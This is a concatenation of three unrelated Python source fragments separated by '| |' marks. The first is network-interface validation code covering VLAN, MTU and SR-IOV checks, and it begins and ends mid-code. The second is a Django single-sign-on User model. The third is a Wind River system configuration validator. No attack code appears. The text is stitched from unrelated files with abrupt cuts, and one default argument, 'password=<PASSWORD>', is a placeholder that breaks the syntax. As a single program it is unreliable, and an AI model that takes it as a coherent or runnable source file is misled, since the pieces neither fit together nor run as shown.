'aemode': constants.AE_MODE_ACTIVE_STANDBY,
'txhashpolicy': None,
'primary_reselect': None,
'vlan_id': None,
'sriov_numvfs': 0,
'sriov_vf_driver': None,
'ptp_role': constants.INTERFACE_PTP_ROLE_NONE,
'max_tx_rate': None}
if interface['ifclass'] == constants.INTERFACE_CLASS_DATA:
defaults['ipv4_mode'] = constants.IPV4_DISABLED
defaults['ipv6_mode'] = constants.IPV6_DISABLED
elif interface['ifclass'] == constants.INTERFACE_CLASS_PLATFORM:
defaults['ipv4_mode'] = None
defaults['ipv6_mode'] = None
interface_merged = interface.copy()
for key in interface_merged:
if interface_merged[key] is None and key in defaults:
interface_merged[key] = defaults[key]
return interface_merged
def _check_interface_vlan_id(op, interface, ihost, from_profile=False):
# Check vlan_id
if 'vlan_id' in interface.keys() and interface['vlan_id'] is not None:
if not str(interface['vlan_id']).isdigit():
raise wsme.exc.ClientSideError(_("VLAN id is an integer value."))
interface['vlan_id'] = int(interface['vlan_id'])
if interface['vlan_id'] < 1 or interface['vlan_id'] > 4094:
raise wsme.exc.ClientSideError(_("VLAN id must be between 1 and 4094."))
else:
interface['vlan_id'] = six.text_type(interface['vlan_id'])
return interface
def _check_interface_name(op, interface, ihost, from_profile=False):
ihost_id = interface['forihostid']
ifname = interface['ifname']
iftype = interface['iftype']
# Check for ifname that has only spaces
if ifname and not ifname.strip():
raise wsme.exc.ClientSideError(_("Interface name cannot be "
"whitespace."))
# Check that ifname contains only lower case
if not ifname.islower():
raise wsme.exc.ClientSideError(_("Interface name must be in "
"lower case."))
# Check that the ifname is the right character length
# Account for VLAN interfaces
iflen = MAX_IFNAME_LEN
if iftype == constants.INTERFACE_TYPE_VLAN:
iflen = iflen + MAX_VLAN_ID_LEN
if ifname and len(ifname) > iflen:
raise wsme.exc.ClientSideError(_("Interface {} has name length "
"greater than {}.".
format(ifname, iflen)))
# Check for invalid characters
vlan_id = None
if iftype == constants.INTERFACE_TYPE_VLAN:
vlan_id = interface['vlan_id']
invalidChars = set(string.punctuation.replace("_", ""))
if vlan_id is not None:
# Allow VLAN interfaces to have "." in the name
invalidChars.remove(".")
if any(char in invalidChars for char in ifname):
msg = _("Cannot use special characters in interface name.")
raise wsme.exc.ClientSideError(msg)
# ifname must be unique within the host
if op == "add":
this_interface_id = 0
else:
this_interface_id = interface['id']
interface_list = pecan.request.dbapi.iinterface_get_all(
forihostid=ihost_id)
for i in interface_list:
if i.id == this_interface_id:
continue
if i.ifname == ifname:
raise wsme.exc.ClientSideError(_("Interface Name {} must be unique.".format(ifname)))
return interface
def _check_interface_mtu(interface, ihost, from_profile=False):
# Check imtu
if 'imtu' in interface.keys() and interface['imtu'] is not None:
if not str(interface['imtu']).isdigit():
raise wsme.exc.ClientSideError(_("MTU is an integer value."))
interface['imtu'] = int(interface['imtu'])
utils.validate_mtu(interface['imtu'])
return interface
def _check_interface_sriov(interface, ihost, from_profile=False):
sriov_update = False
if 'ifclass' in interface.keys() and not interface['ifclass']:
return sriov_update
if (interface['ifclass'] == constants.INTERFACE_CLASS_PCI_SRIOV and
'sriov_numvfs' not in interface.keys()):
raise wsme.exc.ClientSideError(_("A network type of pci-sriov must specify "
"a number for SR-IOV VFs."))
if ('sriov_numvfs' in interface.keys() and interface['sriov_numvfs']
is not None and int(interface['sriov_numvfs']) > 0 and
('ifclass' not in interface.keys() or
interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV)):
raise wsme.exc.ClientSideError(_("Number of SR-IOV VFs is specified "
"but interface class is not "
"pci-sriov."))
if ('sriov_vf_driver' in interface.keys() and interface['sriov_vf_driver']
is not None and
('ifclass' not in interface.keys() or
interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV)):
raise wsme.exc.ClientSideError(_("SR-IOV VF driver is specified "
"but interface class is not "
"pci-sriov."))
if ('ifclass' in interface.keys() and
interface['ifclass'] == constants.INTERFACE_CLASS_PCI_SRIOV and
'sriov_numvfs' in interface.keys()):
if interface['sriov_numvfs'] is None:
raise wsme.exc.ClientSideError(_("Value for number of SR-IOV VFs must be specified."))
if not str(interface['sriov_numvfs']).isdigit():
raise wsme.exc.ClientSideError(_("Value for number of SR-IOV VFs is an integer value."))
if interface['sriov_numvfs'] <= 0:
raise wsme.exc.ClientSideError(_("Value for number of SR-IOV VFs must be > 0."))
if interface['sriov_vf_driver'] is not None:
if interface['sriov_vf_driver'] not in constants.SRIOV_DRIVER_TYPES:
msg = (_("Value for SR-IOV VF driver must be one of "
"{}").format(', '.join(constants.SRIOV_DRIVER_TYPES)))
raise wsme.exc.ClientSideError(msg)
if interface['iftype'] == constants.INTERFACE_TYPE_ETHERNET:
ports = pecan.request.dbapi.ethernet_port_get_all(hostid=ihost['id'])
port_list = [
(p.name, p.sriov_totalvfs, p.driver) for p in ports
if p.interface_id and p.interface_id == interface['id']
]
if len(port_list) != 1:
raise wsme.exc.ClientSideError(_("Exactly one port must be enabled."))
sriov_totalvfs = port_list[0][1]
if sriov_totalvfs is None or sriov_totalvfs == 0:
raise wsme.exc.ClientSideError(_("SR-IOV can't be configured on this interface"))
if int(interface['sriov_numvfs']) > sriov_totalvfs:
raise wsme.exc.ClientSideError(_("The interface support a maximum of %s VFs" % sriov_totalvfs))
driver = port_list[0][2]
if driver is None or not driver:
raise wsme.exc.ClientSideError(_("Corresponding port has invalid driver"))
sriov_update = True
return sriov_update
def _check_host(ihost):
if ihost['administrative'] != constants.ADMIN_LOCKED:
raise wsme.exc.ClientSideError(_("Host must be locked."))
def _check_interface_class_and_host_type(ihost, interface):
if (interface['ifclass'] == constants.INTERFACE_CLASS_DATA and
constants.WORKER not in ihost['subfunctions']):
msg = _("The data interface class is only supported on nodes "
"supporting worker functions")
raise wsme.exc.ClientSideError(msg)
def _check_interface_class_and_type(interface):
if (interface['ifclass'] in PCI_INTERFACE_CLASS and
interface['iftype'] not in [constants.INTERFACE_TYPE_ETHERNET,
constants.INTERFACE_TYPE_VF]):
msg = (_("The {} interface class is only valid on Ethernet and "
"VF interfaces").format(', '.join(PCI_INTERFACE_CLASS)))
raise wsme.exc.ClientSideError(msg)
def _check_interface_class_transition(interface, existing_interface):
if not existing_interface:
return
ifclass = interface['ifclass']
existing_ifclass = existing_interface['ifclass']
if ifclass == existing_ifclass:
return
# to share single vf capable nic, we need to | |
<reponame>g10f/sso
import datetime
import logging
import uuid
from sorl import thumbnail
from current_user.models import CurrentUserField
from django.conf import settings
from django.contrib.auth.models import Permission, PermissionsMixin, AbstractBaseUser, BaseUserManager
from django.contrib.auth.validators import UnicodeUsernameValidator
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.db.models import Q
from django.db.utils import IntegrityError
from django.utils import timezone
from django.utils.encoding import force_str
from django.utils.translation import gettext_lazy as _
from sso.access_requests.models import AccessRequest
from sso.accounts.models import OrganisationChange
from sso.accounts.models.application import ApplicationRole, RoleProfile, Application, Role, get_applicationrole_ids
from sso.accounts.models.user_data import UserEmail, Membership
from sso.decorators import memoize
from sso.emails.models import GroupEmailManager
from sso.models import ensure_single_primary, get_filename
from sso.organisations.models import AdminRegion, Organisation, OrganisationCountry, Association
from sso.registration.models import RegistrationProfile
from sso.signals import default_roles
from sso.utils.email import send_mail
logger = logging.getLogger(__name__)
class UserManager(BaseUserManager):
def _create_user(self, username, password,
is_staff, is_superuser, **extra_fields):
"""
Creates and saves a User with the given username and password.
"""
now = timezone.now()
if not username:
raise ValueError('The given username must be set')
user = self.model(username=username,
is_staff=is_staff, is_active=True,
is_superuser=is_superuser, last_login=now,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
@classmethod
def recovery_expiration_date(cls):
# The date after deactivated users should be deleted
return timezone.now() - datetime.timedelta(minutes=settings.SSO_USER_RECOVERY_PERIOD_MINUTES)
def create_user(self, username, password=<PASSWORD>, **extra_fields):
return self._create_user(username, password, False, False,
**extra_fields)
def create_superuser(self, username, password, **extra_fields):
return self._create_user(username, password, True, True,
**extra_fields)
def get_by_confirmed_or_primary_email(self, email):
q = Q(useremail__email=email) & (Q(useremail__confirmed=True) | Q(useremail__primary=True))
return self.filter(q).prefetch_related('useremail_set').get()
def get_by_email(self, email):
return self.filter(useremail__email=email).prefetch_related('useremail_set').get()
def generate_filename(instance, filename):
return 'image/%s/%s' % (instance.uuid.hex, get_filename(filename.encode('ascii', 'replace')))
class User(AbstractBaseUser, PermissionsMixin):
MAX_PICTURE_SIZE = settings.SSO_USER_MAX_PICTURE_SIZE
PICTURE_WIDTH = settings.SSO_USER_PICTURE_WIDTH
PICTURE_HEIGHT = settings.SSO_USER_PICTURE_HEIGHT
GENDER_CHOICES = [
('m', _('male')),
('f', _('female'))
]
username_validator = UnicodeUsernameValidator()
username = models.CharField(_('username'), max_length=70, unique=True,
help_text=_('Required. 70 characters or fewer. Letters, digits and @/./+/-/_ only.'),
validators=[username_validator], error_messages={
'unique': _("A user with that username already exists."), }, )
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=40, blank=True)
is_staff = models.BooleanField(_('staff status'), default=False, help_text=_('Designates whether the user can log into this admin site.'))
is_active = models.BooleanField(_('active'), default=True, db_index=True, help_text=_(
'Designates whether this user should be treated as active. Unselect this instead of deleting accounts.'))
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
uuid = models.UUIDField(unique=True, default=uuid.uuid4, editable=True)
organisations = models.ManyToManyField(Organisation, verbose_name=_('organisations'), through=Membership, blank=(not settings.SSO_ORGANISATION_REQUIRED))
admin_regions = models.ManyToManyField(AdminRegion, verbose_name=_('admin regions'), blank=True)
admin_organisation_countries = models.ManyToManyField(OrganisationCountry, verbose_name=_('admin countries'), blank=True)
admin_associations = models.ManyToManyField(Association, verbose_name=_('admin associations'), blank=True)
app_admin_regions = models.ManyToManyField(AdminRegion, related_name='app_admin_user', verbose_name=_('app admin regions'), blank=True)
app_admin_organisation_countries = models.ManyToManyField(OrganisationCountry, related_name='app_admin_user',
verbose_name=_('app admin countries'), blank=True)
app_admin_associations = models.ManyToManyField(Association, related_name='app_admin_user', verbose_name=_('app admin associations'), blank=True)
application_roles = models.ManyToManyField(ApplicationRole, verbose_name=_('application roles'), blank=True)
role_profiles = models.ManyToManyField(RoleProfile, verbose_name=_('role profiles'), blank=True,
help_text=_('Organises a group of application roles that are usually '
'assigned together.'))
last_modified_by_user = CurrentUserField(verbose_name=_('last modified by'), related_name='+', on_delete=models.SET_NULL)
last_modified = models.DateTimeField(_('last modified'), auto_now=True)
created_by_user = models.ForeignKey('self', verbose_name=_('created by'), related_name='+', null=True, on_delete=models.SET_NULL)
is_center = models.BooleanField(_('organisation'), default=False,
help_text=_('Designates that this user is representing a organisation and not a '
'private person.'))
is_service = models.BooleanField(_('service'), default=False,
help_text=_('Designates that this user is representing a service account and '
'not a person.'))
is_subscriber = models.BooleanField(_('subscriber'), default=False, help_text=_('Designates whether this user is a newsletter subscriber.'))
picture = thumbnail.ImageField(_('picture'), upload_to=generate_filename, blank=True) # , storage=MediaStorage())
gender = models.CharField(_('gender'), max_length=255, choices=GENDER_CHOICES, blank=True)
dob = models.DateField(_("date of birth"), blank=True, null=True)
homepage = models.URLField(_("homepage"), max_length=512, blank=True)
language = models.CharField(_('language'), max_length=254, choices=settings.LANGUAGES, blank=True)
timezone = models.CharField(_('timezone'), blank=True, max_length=254)
valid_until = models.DateTimeField(_('valid until'), blank=True, null=True)
last_ip = models.GenericIPAddressField(_('last ip address'), blank=True, null=True)
is_stored_permanently = models.BooleanField(_('store permanently'), help_text=_('Do not delete, even if inactive'), default=False)
objects = UserManager()
USERNAME_FIELD = 'username'
class Meta(AbstractBaseUser.Meta):
verbose_name = _('user')
verbose_name_plural = _('users')
permissions = (
("read_user", "Can read user data"),
("access_all_users", "Can access all users"),
("app_admin_access_all_users", "Can access all users as App admin"),
)
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"""Returns the short name for the user."""
return self.first_name
def email_user(self, subject, message, from_email=None, **kwargs):
"""
Sends an email to this User.
"""
if self.primary_email() is not None:
recipient_list = [self.primary_email().email]
if from_email is not None:
from_email = force_str(from_email)
return send_mail(subject, message, recipient_list, from_email=from_email, **kwargs)
else:
logger.error('User %s has no primary_email', self.username)
return 0
def primary_email(self):
# iterate through useremail_set.all because useremail_set is cached
# if we use prefetch_related('useremail_set')
for user_mail in self.useremail_set.all():
if user_mail.primary:
return user_mail
return None
def create_primary_email(self, email, confirmed=None, delete_others=False):
"""
make email as the primary email and all other emails non primary
if the user email does not exist, it is created
the other user emails are marked as not primary or deleted
"""
email = UserManager.normalize_email(email)
user_email = None
for l_user_email in self.useremail_set.all():
if email.lower() == l_user_email.email.lower():
l_user_email.primary = True
l_user_email.email = email
if confirmed is not None:
l_user_email.confirmed = confirmed
l_user_email.save()
user_email = l_user_email
else:
if delete_others:
l_user_email.delete()
else:
if l_user_email.primary:
l_user_email.primary = False
l_user_email.save(update_fields=['primary'])
if not user_email:
kwargs = {'email': email, 'user': self, 'primary': True}
if confirmed is not None:
kwargs['confirmed'] = confirmed
user_email = UserEmail.objects.create(**kwargs)
return user_email
def confirm_primary_email_if_no_confirmed(self):
if not UserEmail.objects.filter(confirmed=True, user=self).exists():
# no confirmed email addresses for this user, then the password reset
# must be send to the primary email and we can mark this email as confirmed
user_email = UserEmail.objects.get(primary=True, user=self)
assert (not user_email.confirmed)
user_email.confirmed = True
user_email.save(update_fields=['confirmed'])
def ensure_single_primary_email(self):
ensure_single_primary(self.useremail_set.all())
def update_last_modified(self):
self.save(update_fields=['last_modified'])
@memoize
def get_last_modified_deep(self):
"""
get the max date of last_modified from user and corresponding address and phones
and use _prefetched_objects_cache if available for performance in api lists
"""
last_modified_list = [self.last_modified]
if hasattr(self, '_prefetched_objects_cache') and ('useraddress_set' in self._prefetched_objects_cache):
last_modified_list += [obj.last_modified for obj in self.useraddress_set.all()]
else:
last_modified_list += self.useraddress_set.values_list("last_modified", flat=True)
if hasattr(self, '_prefetched_objects_cache') and ('userphonenumber_set' in self._prefetched_objects_cache):
last_modified_list += [obj.last_modified for obj in self.userphonenumber_set.all()]
else:
last_modified_list += self.userphonenumber_set.values_list("last_modified", flat=True)
if hasattr(self, '_prefetched_objects_cache') and ('useremail_set' in self._prefetched_objects_cache):
last_modified_list += [obj.last_modified for obj in self.useremail_set.all()]
else:
last_modified_list += self.useremail_set.values_list("last_modified", flat=True)
if hasattr(self, '_prefetched_objects_cache') and ('userattribute_set' in self._prefetched_objects_cache):
last_modified_list += [obj.last_modified for obj in self.userattribute_set.all()]
else:
last_modified_list += self.userattribute_set.values_list("last_modified", flat=True)
last_modified = max(last_modified_list)
return last_modified
@classmethod
def get_primary_or_none(cls, queryset):
# iterate through all items, uses the prefetch_related cache
for item in queryset:
if item.primary:
return item
return None
@classmethod
def get_default_role_profile(cls, role_uuid=None):
role_profile = RoleProfile.objects.none()
if role_uuid is None:
role_uuid = settings.SSO_DEFAULT_MEMBER_PROFILE_UUID
if role_uuid:
try:
role_profile = RoleProfile.objects.get(uuid=role_uuid)
except ObjectDoesNotExist:
pass
return role_profile
@classmethod
def get_default_guest_profile(cls, role_uuid=None):
role_profile = None
if role_uuid is None:
role_uuid = settings.SSO_DEFAULT_GUEST_PROFILE_UUID
if role_uuid:
try:
role_profile = RoleProfile.objects.get(uuid=role_uuid)
except ObjectDoesNotExist:
pass
return role_profile
@classmethod
def get_default_admin_profile(cls):
role_profile = RoleProfile.objects.none()
if settings.SSO_DEFAULT_ADMIN_PROFILE_UUID:
try:
role_profile = RoleProfile.objects.get(uuid=settings.SSO_DEFAULT_ADMIN_PROFILE_UUID)
except ObjectDoesNotExist:
pass
return role_profile
@property
def primary_address(self):
return self.get_primary_or_none(self.useraddress_set.all())
@property
def primary_phone(self):
return self.get_primary_or_none(self.userphonenumber_set.all())
@memoize
def get_apps(self):
applicationrole_ids = self.get_applicationrole_ids()
return Application.objects.distinct().filter(applicationrole__in=applicationrole_ids, is_active=True). \
order_by('order').prefetch_related('applicationrole_set', 'applicationrole_set__role')
def get_global_navigation_urls(self):
applicationrole_ids = self.get_applicationrole_ids()
return Application.objects.distinct().filter(applicationrole__in=applicationrole_ids,
is_active=True,
global_navigation=True).order_by('order')
def get_roles_by_app(self, app_uuid):
applicationrole_ids = self.get_applicationrole_ids()
return Role.objects.distinct().filter(applicationrole__in=applicationrole_ids,
applicationrole__application__uuid=app_uuid)
def get_group_and_role_permissions(self):
"""
get all permissions the user has through his groups and roles
"""
applicationrole_ids = self.get_applicationrole_ids()
q = Q(group__role__applicationrole__in=applicationrole_ids,
group__role__applicationrole__application__uuid=settings.SSO_APP_UUID) | Q(group__user=self)
return Permission.objects.distinct().filter(q)
@memoize
def get_applicationrole_ids(self):
return get_applicationrole_ids(self.id)
@memoize
def get_applicationroles(self):
applicationrole_ids = self.get_applicationrole_ids()
return ApplicationRole.objects.filter(id__in=applicationrole_ids).select_related()
@memoize
def get_administrable_application_roles(self):
"""
get a queryset for the admin
"""
if self.is_superuser:
return ApplicationRole.objects.all().select_related()
else:
applicationrole_ids = self.get_applicationrole_ids()
# all roles the user has, with adequate inheritable flag
if self.is_global_user_admin:
application_roles = ApplicationRole.objects.filter(id__in=applicationrole_ids,
is_inheritable_by_global_admin=True).select_related()
elif self.is_user_admin:
application_roles = ApplicationRole.objects.filter(id__in=applicationrole_ids,
is_inheritable_by_org_admin=True).select_related()
else:
application_roles = ApplicationRole.objects.none()
return application_roles
@memoize
def get_administrable_role_profiles(self):
if self.is_superuser:
return RoleProfile.objects.all().prefetch_related('application_roles', 'application_roles__role',
'application_roles__application')
else:
# all role profiles the user has, with adequate inheritable flag
if self.is_global_user_admin:
role_profiles = self.role_profiles.filter(is_inheritable_by_global_admin=True)
elif self.is_user_admin:
role_profiles = self.role_profiles.filter(is_inheritable_by_org_admin=True)
else:
role_profiles = self.role_profiles.none()
return role_profiles.prefetch_related('application_roles', 'application_roles__role',
'application_roles__application').distinct()
@memoize
def get_administrable_app_admin_application_roles(self):
"""
get a queryset for the admin
"""
if self.is_app_admin():
return ApplicationRole.objects.filter(application__applicationadmin__admin=self)
else:
return ApplicationRole.objects.none()
@memoize
def get_administrable_app_admin_role_profiles(self):
# all role profiles the user has, with adequate inheritable flag
role_profiles = self.role_profiles.none()
if self.is_app_admin():
role_profiles = RoleProfile.objects.filter(roleprofileadmin__admin=self)
return role_profiles.prefetch_related('application_roles', 'application_roles__role',
'application_roles__application').distinct()
@memoize
def get_administrable_user_organisations(self):
"""
return a list of organisations from all the users we have admin rights on
"""
if self.is_global_user_admin:
return Organisation.objects.all().select_related('organisation_country__country', 'email', 'association')
elif self.is_user_admin:
return Organisation.objects.filter(
Q(pk__in=self.organisations.all()) |
Q(admin_region__in=self.admin_regions.all()) |
Q(organisation_country__in=self.admin_organisation_countries.all()) |
Q(association__in=self.admin_associations.all())) \
.select_related('organisation_country__country', 'email', 'association').distinct()
else:
return Organisation.objects.none()
@memoize
def get_administrable_user_regions(self):
"""
return a list of regions from all the users we have admin rights on
"""
| |
"""
Copyright (c) 2015-2017 Wind River Systems, Inc.
SPDX-License-Identifier: Apache-2.0
"""
from configutilities.common.configobjects import DEFAULT_NAMES
from configutilities.common.configobjects import NETWORK_PREFIX_NAMES
from configutilities.common.configobjects import OAM_TYPE
from configutilities.common.configobjects import MGMT_TYPE
from configutilities.common.configobjects import Network
from configutilities.common.configobjects import REGION_CONFIG
from configutilities.common.configobjects import INFRA_TYPE
from configutilities.common.configobjects import DEFAULT_DOMAIN_NAME
from configutilities.common.configobjects import HP_NAMES
from configutilities.common.configobjects import SUBCLOUD_CONFIG
from configutilities.common.configobjects import CLUSTER_TYPE
from netaddr import IPRange
from configutilities.common.utils import lag_mode_to_str
from configutilities.common.utils import validate_network_str
from configutilities.common.utils import check_network_overlap
from configutilities.common.utils import is_mtu_valid
from configutilities.common.utils import get_service
from configutilities.common.utils import get_optional
from configutilities.common.utils import validate_address_str
from configutilities.common.utils import validate_nameserver_address_str
from configutilities.common.utils import is_valid_url
from configutilities.common.utils import is_valid_domain_or_ip
from configutilities.common.exceptions import ConfigFail
from configutilities.common.exceptions import ValidateFail
# Constants
TiS_VERSION = "xxxSW_VERSIONxxx"
# Minimum values for partition sizes
MIN_DATABASE_STORAGE = 20
MIN_IMAGE_STORAGE = 10
MIN_IMAGE_CONVERSIONS_VOLUME = 20
WRSROOT_PASSWD_NO_AGING = 99999
# System mode
SYSTEM_MODE_DUPLEX = "duplex"
SYSTEM_MODE_SIMPLEX = "simplex"
SYSTEM_MODE_DUPLEX_DIRECT = "duplex-direct"
DISTRIBUTED_CLOUD_ROLE_SYSTEMCONTROLLER = 'systemcontroller'
DISTRIBUTED_CLOUD_ROLE_SUBCLOUD = 'subcloud'
# System type
SYSTEM_TYPE_AIO = "All-in-one"
SYSTEM_TYPE_STANDARD = "Standard"
class ConfigValidator(object):
def __init__(self, system_config, cgcs_config, config_type, offboard,
naming_type=DEFAULT_NAMES):
"""
:param system_config: system configuration
:param cgcs_config: if not None config data should be returned
:param config_type: indicates whether it is system, region or subcloud
config
:param offboard: if true only perform general error checking
:return:
"""
self.conf = system_config
self.cgcs_conf = cgcs_config
self.config_type = config_type
self.naming_type = naming_type
self.offboard = offboard
self.next_lag_index = 0
self.configured_networks = []
self.configured_vlans = []
self.pxeboot_network_configured = False
self.pxeboot_section_name = None
self.management_interface = None
self.infrastructure_interface = None
self.cluster_interface = None
self.mgmt_network = None
self.infra_network = None
self.cluster_network = None
self.oam_network = None
self.vswitch_type = None
self.glance_region = None
self.system_mode = None
self.system_type = None
self.system_dc_role = None
def is_simplex_cpe(self):
return self.system_mode == SYSTEM_MODE_SIMPLEX
def is_subcloud(self):
return self.system_dc_role == DISTRIBUTED_CLOUD_ROLE_SUBCLOUD
def set_system_mode(self, mode):
self.system_mode = mode
def set_system_dc_role(self, dc_role):
self.system_dc_role = dc_role
def set_oam_config(self, use_lag, external_oam_interface_name):
if self.cgcs_conf is not None:
self.cgcs_conf.add_section('cEXT_OAM')
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_MTU',
self.oam_network.logical_interface.mtu)
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_SUBNET',
self.oam_network.cidr)
if use_lag:
self.cgcs_conf.set('cEXT_OAM', 'LAG_EXTERNAL_OAM_INTERFACE',
'yes')
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_BOND_MEMBER_0',
self.oam_network.logical_interface.ports[0])
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_BOND_MEMBER_1',
self.oam_network.logical_interface.ports[1])
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_BOND_POLICY',
lag_mode_to_str(self.oam_network.
logical_interface.lag_mode))
else:
self.cgcs_conf.set('cEXT_OAM', 'LAG_EXTERNAL_OAM_INTERFACE',
'no')
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_INTERFACE',
external_oam_interface_name)
if self.oam_network.vlan:
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_VLAN',
str(self.oam_network.vlan))
external_oam_interface_name += '.' + str(self.oam_network.vlan)
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_INTERFACE_NAME',
external_oam_interface_name)
if self.oam_network.gateway_address:
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_GATEWAY_ADDRESS',
str(self.oam_network.gateway_address))
if self.system_mode == SYSTEM_MODE_SIMPLEX:
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_FLOATING_ADDRESS',
str(self.oam_network.floating_address))
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_0_ADDRESS',
str(self.oam_network.address_0))
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_1_ADDRESS',
str(self.oam_network.address_1))
else:
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_FLOATING_ADDRESS',
str(self.oam_network.floating_address or
self.oam_network.start_address))
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_0_ADDRESS',
str(self.oam_network.address_0 or
self.oam_network.start_address + 1))
self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_1_ADDRESS',
str(self.oam_network.address_1 or
self.oam_network.start_address + 2))
def process_oam_on_its_own_interface(self):
use_lag = False
oam_prefix = NETWORK_PREFIX_NAMES[self.naming_type][OAM_TYPE]
# OAM on its own LAG interface
if self.oam_network.logical_interface.lag_interface:
if self.oam_network.logical_interface.lag_mode not in (1, 2, 4):
raise ConfigFail(
"Unsupported LAG mode (%d) for %s interface"
" - use LAG mode 1, 2, or 4 instead" %
(self.oam_network.logical_interface.lag_mode, oam_prefix))
use_lag = True
external_oam_interface = 'bond' + str(self.next_lag_index)
else:
# CAN on its own non-LAG interface
external_oam_interface = (
self.oam_network.logical_interface.ports[0])
return use_lag, external_oam_interface
def validate_oam_common(self):
# validate OAM network
self.oam_network = Network()
if self.is_simplex_cpe():
min_addresses = 1
else:
min_addresses = 3
try:
self.oam_network.parse_config(self.conf, self.config_type,
OAM_TYPE,
min_addresses=min_addresses,
multicast_addresses=0,
naming_type=self.naming_type)
except ConfigFail:
raise
except Exception as e:
raise ConfigFail("Error parsing configuration file: %s" % e)
def validate_aio_simplex_mgmt(self):
# AIO simplex management network configuration
mgmt_prefix = NETWORK_PREFIX_NAMES[self.naming_type][MGMT_TYPE]
self.mgmt_network = Network()
min_addresses = 16
try:
self.mgmt_network.parse_config(self.conf, self.config_type,
MGMT_TYPE,
min_addresses=min_addresses,
multicast_addresses=0,
naming_type=self.naming_type,
logical_interface_required=False)
except ConfigFail:
raise
except Exception as e:
raise ConfigFail("Error parsing configuration file: %s" % e)
if self.mgmt_network.vlan or self.mgmt_network.multicast_cidr or \
self.mgmt_network.start_end_in_config or \
self.mgmt_network.floating_address or \
self.mgmt_network.address_0 or self.mgmt_network.address_1 or \
self.mgmt_network.dynamic_allocation or \
self.mgmt_network.gateway_address or \
self.mgmt_network.logical_interface:
raise ConfigFail("For AIO simplex, only the %s network CIDR can "
"be specified" % mgmt_prefix)
if self.mgmt_network.cidr.version == 6:
raise ConfigFail("IPv6 management network not supported on "
"simplex configuration.")
if self.cgcs_conf is not None:
self.cgcs_conf.add_section('cMGMT')
self.cgcs_conf.set('cMGMT', 'MANAGEMENT_SUBNET',
self.mgmt_network.cidr)
def validate_aio_network(self, subcloud=False):
if not subcloud:
# AIO-SX subcloud supports MGMT_NETWORK & PXEBOOT_NETWORK
if self.conf.has_section('PXEBOOT_NETWORK'):
raise ConfigFail("PXEBoot Network configuration is not "
"supported.")
if self.conf.has_section('MGMT_NETWORK'):
self.validate_aio_simplex_mgmt()
if self.conf.has_section('INFRA_NETWORK'):
raise ConfigFail("Infrastructure Network configuration is not "
"supported.")
if self.conf.has_section('BOARD_MANAGEMENT_NETWORK'):
raise ConfigFail("Board Management Network configuration is not "
"supported.")
# validate OAM network
oam_prefix = NETWORK_PREFIX_NAMES[self.naming_type][OAM_TYPE]
self.validate_oam_common()
(use_lag, external_oam_interface_name) = (
self.process_oam_on_its_own_interface())
# Ensure that the gateway was configured
if self.oam_network.gateway_address is None:
raise ConfigFail(
"No gateway specified - %s_GATEWAY must be specified"
% oam_prefix)
# Check overlap with management network
if self.mgmt_network is not None:
try:
self.configured_networks.append(self.mgmt_network.cidr)
check_network_overlap(self.oam_network.cidr,
self.configured_networks)
except ValidateFail:
raise ConfigFail("%s CIDR %s overlaps with another configured "
"network" %
(oam_prefix, str(self.mgmt_network.cidr)))
self.set_oam_config(use_lag, external_oam_interface_name)
def validate_version(self):
if self.offboard:
version = TiS_VERSION
else:
from tsconfig.tsconfig import SW_VERSION
version = SW_VERSION
if not self.conf.has_option('VERSION', 'RELEASE'):
raise ConfigFail(
"Version information is missing from this config file. Please"
" refer to the installation documentation for details on "
"the correct contents of the configuration file.")
ini_version = self.conf.get('VERSION', 'RELEASE')
if version != ini_version:
raise ConfigFail(
"The configuration file given is of a different version (%s) "
"than the installed software (%s). Please refer to the "
"installation documentation for details on the correct "
"contents of the configuration file and update it with "
"any changes required for this release." %
(ini_version, version))
def validate_system(self):
# timezone section
timezone = 'UTC'
if self.conf.has_option('SYSTEM', 'TIMEZONE'):
timezone = self.conf.get('SYSTEM', 'TIMEZONE')
# system type section
if self.conf.has_option("SYSTEM", "SYSTEM_TYPE"):
self.system_type = self.conf.get("SYSTEM", "SYSTEM_TYPE")
available_system_types = [
SYSTEM_TYPE_STANDARD,
SYSTEM_TYPE_AIO
]
if self.system_type not in available_system_types:
raise ConfigFail("Available options for SYSTEM_TYPE are: %s" %
available_system_types)
elif not self.offboard:
from tsconfig.tsconfig import system_type
self.system_type = system_type
# system mode section
if self.conf.has_option("SYSTEM", "SYSTEM_MODE"):
self.system_mode = self.conf.get("SYSTEM", "SYSTEM_MODE")
available_system_modes = [SYSTEM_MODE_DUPLEX]
if self.system_type != SYSTEM_TYPE_STANDARD:
available_system_modes.append(SYSTEM_MODE_SIMPLEX)
available_system_modes.append(SYSTEM_MODE_DUPLEX_DIRECT)
if self.system_mode not in available_system_modes:
raise ConfigFail("Available options for SYSTEM_MODE are: %s" %
available_system_modes)
else:
if self.system_type == SYSTEM_TYPE_STANDARD:
self.system_mode = SYSTEM_MODE_DUPLEX
else:
self.system_mode = SYSTEM_MODE_DUPLEX_DIRECT
if self.conf.has_option("SYSTEM", "DISTRIBUTED_CLOUD_ROLE"):
self.system_dc_role = \
self.conf.get("SYSTEM", "DISTRIBUTED_CLOUD_ROLE")
